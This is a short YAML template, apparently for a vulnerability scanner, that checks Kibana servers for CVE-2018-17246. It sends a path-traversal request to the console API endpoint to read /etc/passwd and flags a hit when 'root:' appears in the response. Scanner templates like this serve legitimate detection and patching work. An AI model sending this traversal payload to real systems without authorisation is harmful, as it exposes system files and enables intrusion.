id: kibana-lfi
info:
  name: Kibana LFI - CVE-2018-17246
  risk: High

params:
  - root: "{{.BaseURL}}"

replicate:
  ports: '5601'
  prefixes: 'kibana'

requests:
  - method: GET
    url: >-
      {{.root}}/api/console/api_server?sense_version=@@SENSE_VERSION&apis=../../../../../../.../../../../etc/passwd
    headers:
      - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
    detections:
      - >-
        StatusCode() == 200 && StringSearch("response", "root:") && StringSearch("response", "bin/bash")

references:
  - link: https://github.com/mpgn/CVE-2018-17246